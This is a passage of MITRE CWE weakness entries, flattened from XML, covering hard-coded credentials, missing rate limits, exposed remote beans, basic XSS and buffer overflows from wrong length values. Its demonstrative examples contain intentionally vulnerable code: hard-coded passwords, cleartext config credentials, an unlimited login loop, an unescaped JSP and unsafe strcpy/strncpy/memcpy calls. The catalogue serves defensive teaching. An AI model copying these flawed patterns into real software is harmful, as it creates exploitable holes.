Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies - - - - - High - - - Dynamic Analysis with Manual Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Network Sniffer - Forced Path Execution - - - - - SOAR Partial - - - Manual Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Focused Manual Spotcheck - Focused manual analysis of source - Manual Source Code Review (not inspections) - - - - - High - - - Automated Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Source code Weakness Analyzer - Context-configured Source Code Weakness Analyzer - - - - - High - - - Automated Static Analysis - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Configuration Checker - - - - - SOAR Partial - - - Architecture or Design Review - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) - Formal Methods / Correct-By-Construction - - - - - High - - - - - Architecture and Design - - For outbound authentication: store passwords, keys, and other credentials outside of the code in a strongly-protected, encrypted configuration file or database that is protected from access by all outsiders, including other local users on the same system. Properly protect the key (CWE-320). If you cannot use encryption to protect the file, then make sure that the permissions are as restrictive as possible [REF-7]. - In Windows environments, the Encrypted File System (EFS) may provide some protection. - - - - Architecture and Design - For inbound authentication: Rather than hard-code a default username and password, key, or other authentication credentials for first time logins, utilize a "first login" mode that requires the user to enter a unique strong password or key. - - - Architecture and Design - If the software must contain hard-coded credentials or they cannot be removed, perform access control checks and limit which entities can access the feature that requires the hard-coded credentials. For example, a feature might only be enabled through the system console instead of through a network connection. - - - Architecture and Design - - For inbound authentication using passwords: apply strong one-way hashes to passwords and store those hashes in a configuration file or database with appropriate access control. That way, theft of the file/database still requires the attacker to try to crack the password. When handling an incoming password during authentication, take the hash of the password and compare it to the saved hash. - Use randomly assigned salts for each separate hash that is generated. This increases the amount of computation that an attacker needs to conduct a brute-force attack, possibly limiting the effectiveness of the rainbow table method. - - - - Architecture and Design - - For front-end to back-end connections: Three solutions are possible, although none are complete. - - - The first suggestion involves the use of generated passwords or keys that are changed automatically and must be entered at given time intervals by a system administrator. These passwords will be held in memory and only be valid for the time intervals. - Next, the passwords or keys should be limited at the back end to only performing actions valid for the front end, as opposed to having full access. - Finally, the messages sent should be tagged and checksummed with time sensitive values so as to prevent replay-style attacks. - - - - - - - - The following code uses a hard-coded password to connect to a database: - - ...DriverManager.getConnection(url, "scott", "tiger");... - - This is an example of an external hard-coded password on the client-side of a connection. This code will run successfully, but anyone who has access to it will have access to the password. Once the program has shipped, there is no going back from the database user "scott" with a password of "tiger" unless the program is patched. A devious employee with access to this information can use it to break into the system. Even worse, if attackers have access to the bytecode for application, they can use the javap -c command to access the disassembled code, which will contain the values of the passwords used. The result of this operation might look something like the following for the example above: - - javap -c ConnMngr.class22: ldc #36; //String jdbc:mysql://ixne.com/rxsql24: ldc #38; //String scott26: ldc #17; //String tiger - - - - - The following code is an example of an internal hard-coded password in the back-end: - - int VerifyAdmin(char *password) { - if (strcmp(password, "Mew!")) { - - printf("Incorrect Password!\n");return(0) - }printf("Entering Diagnostic Mode...\n");return(1); - } - - - int VerifyAdmin(String password) {if (!password.equals("Mew!")) {return(0)}//Diagnostic Modereturn(1);} - - Every instance of this program can be placed into diagnostic mode with the same password. Even worse is the fact that if this program is distributed as a binary-only distribution, it is very difficult to change that password or disable this "functionality." - - - The following code examples attempt to verify a password using a hard-coded cryptographic key. - - int VerifyAdmin(char *password) { - if (strcmp(password,"68af404b513073584c4b6f22b6c63e6b")) { - - printf("Incorrect Password!\n");return(0); - }printf("Entering Diagnostic Mode...\n");return(1); - } - - - public boolean VerifyAdmin(String password) {if (password.equals("68af404b513073584c4b6f22b6c63e6b")) {System.out.println("Entering Diagnostic Mode...");return true;}System.out.println("Incorrect Password!");return false; - - - - int VerifyAdmin(String password) {if (password.Equals("68af404b513073584c4b6f22b6c63e6b")) {Console.WriteLine("Entering Diagnostic Mode...");return(1);}Console.WriteLine("Incorrect Password!");return(0);} - - The cryptographic key is within a hard-coded string value that is compared to the password. It is likely that an attacker will be able to read the key and compromise the system. - - - The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext. - This Java example shows a properties file with a cleartext username / password pair. - - - - # Java Web App ResourceBundle properties file - ...webapp.ldap.username=secretUsernamewebapp.ldap.password=secretPassword... - - The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext. - - ...<connectionStrings><add name="ud_DEV" connectionString="connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;" providerName="System.Data.Odbc" /></connectionStrings>... - - Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information. - - - - - CVE-2010-2772 - SCADA system uses a hard-coded password to protect back-end database containing authorization information, exploited by Stuxnet worm - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2772 - - - CVE-2010-2073 - FTP server library uses hard-coded usernames and passwords for three default accounts - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2073 - - - CVE-2010-1573 - Chain: Router firmware uses hard-coded username and password for access to debug functionality, which can be used to execute arbitrary code - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1573 - - - CVE-2008-2369 - Server uses hard-coded authentication key - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2369 - - - CVE-2008-0961 - Backup product uses hard-coded username and password, allowing attackers to bypass authentication via the RPC interface - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0961 - - - CVE-2008-1160 - Security appliance uses hard-coded password allowing attackers to gain root access - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1160 - - - CVE-2006-7142 - Drive encryption product stores hard-coded cryptographic keys for encrypted configuration files in executable programs - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7142 - - - CVE-2005-3716 - VoIP product uses unchangeable hard-coded public credentials that cannot be changed, which allows attackers to obtain sensitive information - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3716 - - - CVE-2005-3803 - VoIP product uses hard coded public and private SNMP community strings that cannot be changed, which allows remote attackers to obtain sensitive information - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3803 - - - CVE-2005-0496 - Backup product contains hard-coded credentials that effectively serve as a back door, which allows remote attackers to access the file system - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0496 - - - - - MSC03-J - Never hard code sensitive information - - - ASCSM-CWE-798 - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2010-01-15 - More abstract entry for hard-coded password and hard-coded cryptographic key. - - - CWE Content Team - MITRE - 2010-04-05 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-06-21 - updated Common_Consequences, References - - - CWE Content Team - MITRE - 2010-09-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-12-13 - updated Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-27 - updated Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2011-09-13 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, Related_Attack_Patterns, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Demonstrative_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2013-02-21 - updated Applicable_Platforms, References - - - CWE Content Team - MITRE - 2014-07-30 - updated Demonstrative_Examples, Detection_Factors - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Causal_Nature, Demonstrative_Examples, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated References - - - CWE Content Team - MITRE - 2019-01-03 - updated References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2019-09-19 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2021-07-20 - updated Relationships - - - - - The software does not properly limit the number or frequency of interactions that it has with an actor, such as the number of incoming requests. - This can allow the actor to perform actions more frequently than expected. The actor could be a human or an automated process such as a virus or bot. This could be used to cause a denial of service, compromise program logic (such as limiting humans to a single vote), or other consequences. For example, an authentication routine might not limit the number of times an attacker can guess a password. Or, a web site might conduct a poll but only expect humans to vote a maximum of once a day. - - - - - - Primary - - - - - - - - Insufficient anti-automation - The term "insufficient anti-automation" focuses primarly on non-human actors such as viruses or bots, but the scope of this CWE entry is broader. - - - Brute force - Vulnerabilities that can be targeted using brute force attacks are often symptomatic of this weakness. - - - - - Architecture and Design - - - Implementation - - - Operation - - - - - Availability - Access Control - Other - DoS: Resource Consumption (Other) - Bypass Protection Mechanism - Other - - - - - In the following code a username and password is read from a socket and an attempt is made to authenticate the username and password. The code will continuously checked the socket for a username and password until it has been authenticated. - - char username[USERNAME_SIZE];char password[PASSWORD_SIZE]; - while (isValidUser == 0) { - if (getNextMessage(socket, username, USERNAME_SIZE) > 0) {if (getNextMessage(socket, password, PASSWORD_SIZE) > 0) {isValidUser = AuthenticateUser(username, password);}} - }return(SUCCESS); - - This code does not place any restriction on the number of authentication attempts made. There should be a limit on the number of authentication attempts made to prevent brute force attacks as in the following example code. - - int count = 0;while ((isValidUser == 0) && (count < MAX_ATTEMPTS)) { - if (getNextMessage(socket, username, USERNAME_SIZE) > 0) {if (getNextMessage(socket, password, PASSWORD_SIZE) > 0) {isValidUser = AuthenticateUser(username, password);}}count++; - }if (isValidUser) {return(SUCCESS);}else {return(FAIL);} - - - - - - CVE-2002-1876 - Mail server allows attackers to prevent other users from accessing mail by sending large number of rapid requests. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1876 - - - - - 21 - Insufficient Anti-Automation - - - - - - - - CWE Content Team - MITRE - 2010-01-15 - New entry to handle anti-automation as identified in WASC. - - - CWE Content Team - MITRE - 2010-04-05 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-03-29 - updated Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - When an application exposes a remote interface for an entity bean, it might also expose methods that get or set the bean's data. These methods could be leveraged to read sensitive information, or to change data in ways that violate the application's expectations, potentially leading to other vulnerabilities. - - - - - - Architecture and Design - - - Implementation - - - - - Confidentiality - Integrity - Read Application Data - Modify Application Data - - - - - Implementation - Declare Java beans "local" when possible. When a bean must be remotely accessible, make sure that sensitive information is not exposed, and ensure that the application logic performs appropriate validation of any data that might be modified by an attacker. - - - - - The following example demonstrates the weakness. - - <ejb-jar><enterprise-beans><entity><ejb-name>EmployeeRecord</ejb-name><home>com.wombat.empl.EmployeeRecordHome</home><remote>com.wombat.empl.EmployeeRecord</remote>...</entity>...</enterprise-beans></ejb-jar> - - - - - - J2EE Misconfiguration: Unsafe Bean Declaration - - - SFP23 - Exposed Data - - - - - - - Entity beans that expose a remote interface become part of an application's attack surface. For performance reasons, an application should rarely use remote entity beans, so there is a good chance that a remote entity bean declaration is an error. - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - - - The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special characters such as "<", ">", and "&" that could be interpreted as web-scripting elements when they are sent to a downstream component that processes web pages. - This may allow such characters to be treated as control characters, which are executed client-side in the context of the user's session. Although this can be classified as an injection problem, the more pertinent issue is the improper conversion of such special characters to respective context-appropriate entities before displaying them to the user. - - - - - - Primary - - - - - - - - Implementation - - - High - - - Confidentiality - Integrity - Availability - Read Application Data - Execute Unauthorized Code or Commands - - - - - Implementation - Carefully check each input parameter against a rigorous positive specification (allowlist) defining the specific characters and format allowed. All input should be neutralized, not just parameters that the user is supposed to specify, but all data in the request, including hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. We often encounter data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended. - - - Implementation - Output Encoding - - Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component. - The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks. - - - - Implementation - With Struts, write all data from form beans with the bean's filter attribute set to true. - - - Implementation - Attack Surface Reduction - To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set. - Defense in Depth - - - - - In the following example, a guestbook comment isn't properly encoded, filtered, or otherwise neutralized for script-related tags before being displayed in a client browser. - - <% for (Iterator i = guestbook.iterator(); i.hasNext(); ) {Entry e = (Entry) i.next(); %><p>Entry #<%= e.getId() %></p><p><%= e.getText() %></p><%} %> - - - - - - - CVE-2002-0938 - XSS in parameter in a link. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0938 - - - CVE-2002-1495 - XSS in web-based email product via attachment filenames. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1495 - - - CVE-2003-1136 - HTML injection in posted message. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1136 - - - CVE-2004-2171 - XSS not quoted in error page. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2171 - - - - - Basic XSS - - - SFP24 - Tainted input to command - - - - - - - - - - - PLOVER - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - KDM Analytics - 2008-08-01 - added/updated white box definitions - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples, Description, Name - - - KDM Analytics - 2009-07-17 - Improved the White_Box_Definition - - - CWE Content Team - MITRE - 2009-07-27 - updated White_Box_Definitions - - - CWE Content Team - MITRE - 2010-06-21 - updated Demonstrative_Examples, Description, Name, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Description, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-05-03 - updated Potential_Mitigations, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Causal_Nature, Likelihood_of_Exploit, Relationships, White_Box_Definitions - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Basic XSS - Failure to Sanitize Script-Related HTML Tags in a Web Page (Basic XSS) - Improper Sanitization of Script-Related HTML Tags in a Web Page (Basic XSS) - - - - The software uses a CAPTCHA challenge, but the challenge can be guessed or automatically recognized by a non-human actor. - - An automated attacker could bypass the intended protection of the CAPTCHA challenge and perform actions at a higher frequency than humanly possible, such as launching spam attacks. - There can be several different causes of a guessable CAPTCHA: - - - An audio or visual image that does not have sufficient distortion from the unobfuscated source image. - A question is generated that with a format that can be automatically recognized, such as a math question. - A question for which the number of possible answers is limited, such as birth years or favorite sports teams. - A general-knowledge or trivia question for which the answer can be accessed using a data base, such as country capitals or popular actors. - Other data associated with the CAPTCHA may provide hints about its contents, such as an image whose filename contains the word that is used in the CAPTCHA. - - - - - - - - - - - Primary - - - - - - - - - Architecture and Design - - - Implementation - - - - - Access Control - Other - Bypass Protection Mechanism - Other - When authorization, authentication, or another protection mechanism relies on CAPTCHA entities to ensure that only human actors can access certain functionality, then an automated attacker such as a bot may access the restricted functionality by guessing the CAPTCHA. - - - - - 21 - Insufficient Anti-Automation - - - - - - - - CWE Content Team - MITRE - 2010-01-15 - New entry to handle anti-automation as identified in WASC. - - - CWE Content Team - MITRE - 2010-06-21 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Likelihood_of_Exploit - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The software uses a sequential operation to read or write a buffer, but it uses an incorrect length value that causes it to access memory that is outside of the bounds of the buffer. - When the length value exceeds the size of the destination, a buffer overflow could occur. - - - - - - - - Resultant - - - Primary - - - - - - - - - - Implementation - - - High - - - Integrity - Confidentiality - Availability - Read Memory - Modify Memory - Execute Unauthorized Code or Commands - Buffer overflows often can be used to execute arbitrary code, which is usually outside the scope of a program's implicit security policy. This can often be used to subvert any other security service. - - - Availability - Modify Memory - DoS: Crash, Exit, or Restart - DoS: Resource Consumption (CPU) - Buffer overflows generally lead to crashes. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop. - - - - - Automated Static Analysis - - This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives. - Automated static analysis generally does not account for environmental considerations when reporting out-of-bounds memory operations. This can make it difficult for users to determine which warnings should be investigated first. For example, an analysis tool might report buffer overflows that originate from command line arguments in a program that is not expected to run with setuid or other special privileges. - - High - Detection techniques for buffer-related errors are more mature than for most other weakness types. - - - Automated Dynamic Analysis - This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results. - Moderate - Without visibility into the code, black box methods may not be able to sufficiently distinguish this weakness from others, requiring manual methods to diagnose the underlying problem. - - - Manual Analysis - Manual analysis can be useful for finding this weakness, but it might not achieve desired code coverage within limited time constraints. This becomes difficult for weaknesses that must be considered for all inputs, since the attack surface can be too large. - - - - - Requirements - Language Selection - - Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. - For example, many languages that perform their own memory management, such as Java and Perl, are not subject to buffer overflows. Other languages, such as Ada and C#, typically provide overflow protection, but the protection can be disabled by the programmer. - Be wary that a language's interface to native code may still be subject to overflows, even if the language itself is theoretically safe. - - - - Architecture and Design - Libraries or Frameworks - - Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. - Examples include the Safe C String Library (SafeStr) by Messier and Viega [REF-57], and the Strsafe.h library from Microsoft [REF-56]. These libraries provide safer versions of overflow-prone string-handling functions. - - This is not a complete solution, since many buffer overflows are not related to strings. - - - Build and Compilation - Compilation or Build Hardening - - Run or compile the software using features or extensions that automatically provide a protection mechanism that mitigates or eliminates buffer overflows. - For example, certain compilers and extensions provide automatic buffer overflow detection mechanisms that are built into the compiled code. Examples include the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice. - - Defense in Depth - This is not necessarily a complete solution, since these mechanisms can only detect certain types of overflows. In addition, an attack could still cause a denial of service, since the typical response is to exit the application. - - - Implementation - - Consider adhering to the following rules when allocating and managing an application's memory: - - - Double check that the buffer is as large as specified. - When using functions that accept a number of bytes to copy, such as strncpy(), be aware that if the destination buffer size is equal to the source buffer size, it may not NULL-terminate the string. - Check buffer boundaries if accessing the buffer in a loop and make sure there is no danger of writing past the allocated space. - If necessary, truncate all input strings to a reasonable length before passing them to the copy and concatenation functions. - - - - - - Architecture and Design - For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server. - - - Operation - Environment Hardening - - Run or compile the software using features or extensions that randomly arrange the positions of a program's executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code. - Examples include Address Space Layout Randomization (ASLR) [REF-58] [REF-60] and Position-Independent Executables (PIE) [REF-64]. - - Defense in Depth - This is not a complete solution. However, it forces the attacker to guess an unknown value that changes every program execution. In addition, an attack could still cause a denial of service, since the typical response is to exit the application. - - - Operation - Environment Hardening - Use a CPU and operating system that offers Data Execution Protection (NX) or its equivalent [REF-60] [REF-61]. - Defense in Depth - This is not a complete solution, since buffer overflows could be used to overwrite nearby variables to modify the software's state in dangerous ways. In addition, it cannot be used in cases in which self-modifying code is required. Finally, an attack could still cause a denial of service, since the typical response is to exit the application. - - - Architecture and Design - Operation - Environment Hardening - Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations. - - - Architecture and Design - Operation - Sandbox or Jail - - Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. - OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. - This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. - Be careful to avoid CWE-243 and other weaknesses related to jails. - - Limited - The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed. - - - - - This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer. - - void host_lookup(char *user_supplied_addr){ - struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp); - - /*routine that ensures user_supplied_addr is in the right format for conversion */ - - validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);strcpy(hostname, hp->h_name); - } - - This function allocates a buffer of 64 bytes to store the hostname under the assumption that the maximum length value of hostname is 64 bytes, however there is no guarantee that the hostname will not be larger than 64 bytes. If an attacker specifies an address which resolves to a very large hostname, then the function may overwrite sensitive data or even relinquish control flow to the attacker. - Note that this example also contains an unchecked return value (CWE-252) that can lead to a NULL pointer dereference (CWE-476). - - - In the following example, it is possible to request that memcpy move a much larger segment of memory than assumed: - - int returnChunkSize(void *) { - - - /* if chunk info is valid, return the size of usable memory, - - - * else, return -1 to indicate an error - - - */ - ... - }int main() {...memcpy(destBuf, srcBuf, (returnChunkSize(destBuf)-1));...} - - If returnChunkSize() happens to encounter an error it will return -1. Notice that the return value is not checked before the memcpy operation (CWE-252), so -1 can be passed as the size argument to memcpy() (CWE-805). Because memcpy() assumes that the value is unsigned, it will be interpreted as MAXINT-1 (CWE-195), and therefore will copy far more memory than is likely available to the destination buffer (CWE-787, CWE-788). - - - In the following example, the source character string is copied to the dest character string using the method strncpy. - - ...char source[21] = "the character string";char dest[12];strncpy(dest, source, sizeof(source)-1);... - - However, in the call to strncpy the source character string is used within the sizeof call to determine the number of characters to copy. This will create a buffer overflow as the size of the source character string is greater than the dest character string. The dest character string should be used within the sizeof call to ensure that the correct number of characters are copied, as shown below. - - ...char source[21] = "the character string";char dest[12];strncpy(dest, source, sizeof(dest)-1);... - - - - In this example, the method outputFilenameToLog outputs a filename to a log file. The method arguments include a pointer to a character string containing the file name and an integer for the number of characters in the string. The filename is copied to a buffer where the buffer size is set to a maximum size for inputs to the log file. The method then calls another method to save the contents of the buffer to the log file. - - #define LOG_INPUT_SIZE 40 - - // saves the file name to a log file - int outputFilenameToLog(char *filename, int length) { - int success; - - // buffer with size set to maximum size for input to log file - char buf[LOG_INPUT_SIZE]; - - // copy filename to buffer - strncpy(buf, filename, length); - - // save to log file - success = saveToLogFile(buf); - return success; - } - - However, in this case the string copy method, strncpy, mistakenly uses the length method argument to determine the number of characters to copy rather than using the size of the local character string, buf. This can lead to a buffer overflow if the number of characters contained in character string pointed to by filename is larger then the number of characters allowed for the local character string. The string copy method should use the buf character string within a sizeof call to ensure that only characters up to the size of the buf array are copied to avoid a buffer overflow, as shown below. - - ... - // copy filename to buffer - strncpy(buf, filename, sizeof(buf)-1);... - - - - - - CVE-2011-1959 - Chain: large length value causes buffer over-read (CWE-126) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1959 - - - CVE-2011-1848 - Use of packet length field to make a calculation, then copy into a fixed-size buffer - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1848 - - - CVE-2011-0105 - Chain: retrieval of length value from an uninitialized memory location - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0105 - - - CVE-2011-0606 - Crafted length value in document reader leads to buffer overflow - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0606 - - - CVE-2011-0651 - SSL server overflow when the sum of multiple length fields exceeds a given value - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0651 - - - CVE-2010-4156 - Language interpreter API function doesn't validate length argument, leading to information exposure - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4156 - - - - Memory - - - - ARR38-C - Guarantee that library functions do not form invalid pointers - Imprecise - - - - - - - - - - - - - - - - - - - - - CWE Content Team - MITRE - 2010-01-15 - - - CWE Content Team - MITRE - 2010-04-05 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-06-21 - updated Common_Consequences, Potential_Mitigations, References - - - CWE Content Team - MITRE - 2010-09-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-12-13 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Demonstrative_Examples, Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Potential_Mitigations, References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-02-18 - updated Potential_Mitigations, References - - - CWE Content Team - MITRE - 2014-06-23 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Causal_Nature, Demonstrative_Examples, Likelihood_of_Exploit, References, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2018-03-27 - updated References - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Common_Consequences - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Demonstrative_Examples, Potential_Mitigations - - - - - The software uses the size of a source buffer when reading from or writing to a destination buffer, which may cause it to access memory that is outside of the bounds of the buffer. - When the size of the destination is smaller than the size of the source, a buffer overflow could occur. - - - - - - Resultant - - - Primary - - - - - - - - - Implementation - - - - - Availability - Modify Memory - DoS: Crash, Exit, or Restart - DoS: Resource Consumption (CPU) - Buffer overflows generally lead to crashes. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop. - - - Integrity - Confidentiality - Availability - Read Memory - Modify Memory - Execute Unauthorized Code or Commands - Buffer overflows often can be used to execute arbitrary code, which is usually outside the scope of a program's implicit security policy. - - - Access Control - Bypass Protection Mechanism - When the consequence is arbitrary code execution, this can often be used to subvert any other security service. - - - - - Architecture and Design - Use an abstraction library to abstract away risky APIs. Examples include the Safe C String Library (SafeStr) by Viega, and the Strsafe.h library from Microsoft. This is not a complete solution, since many buffer overflows are not related to strings. - - - Build and 